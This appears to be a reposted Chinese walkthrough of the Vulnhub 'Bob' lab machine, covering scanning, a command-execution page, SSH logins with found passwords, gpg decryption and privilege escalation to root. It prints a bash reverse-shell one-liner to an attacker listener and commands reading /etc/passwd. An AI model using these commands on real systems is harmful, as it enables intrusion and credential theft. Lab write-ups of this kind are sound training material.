Vulnhub靶机BOB渗透笔记

admin 2024年1月12日15:24:04评论16 views字数 863阅读2分52秒阅读模式

靶机信息:

名称:Bob: 1.0.1

下载地址:

https://www.vulnhub.com/entry/bob-101,226

信息收集

  1. 获取靶机ip地址:

Vulnhub靶机BOB渗透笔记

2.详细信息扫描:

Vulnhub靶机BOB渗透笔记

3.Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto使用Perl语言编写运行,Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等.

Vulnhub靶机BOB渗透笔记

渗透过程

1.逐个访问目录最后在/dev_shell.php文件下发现点东西,经过测试可以执行linux命令,那么执行反弹shell,使用bash反弹,首先kali开启监听:

Vulnhub靶机BOB渗透笔记

2.输入框输入反弹shell代码:

bash -c 'exec bash -i &>/dev/tcp/192.168.10.223/4444 <&1'

Vulnhub靶机BOB渗透笔记

3.查看用户,发现了六个用户:

cat /etc/passwd | grep /bin/bash

Vulnhub靶机BOB渗透笔记

4.在/home/bob发现了一个名叫.old_passwordfile.html的文件,查看内容发现了两组用户名和密码:

Vulnhub靶机BOB渗透笔记

5.使用得到的用户ssh登录

Vulnhub靶机BOB渗透笔记

6.在/home/bob/Documents目录下发现了一个login.txt.gpg文件,是个加密文件

Vulnhub靶机BOB渗透笔记

7.继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?

Vulnhub靶机BOB渗透笔记

8.回到加密文件所在的地方,解密试试:

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

解密之后得到了bob的用户名和密码:

Vulnhub靶机BOB渗透笔记

9.使用bob用户登录

ssh bob@192.168.11.151 -p 25468

提权

查看bob有什么权限,发现bob拥有root用户的所有权限,直接切换到root用户,提权成功!

Vulnhub靶机BOB渗透笔记

原文始发于微信公众号(网络安全学习爱好者):Vulnhub靶机BOB渗透笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月12日15:24:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub靶机BOB渗透笔记https://cn-sec.com/archives/2385790.html

发表评论

匿名网友 填写信息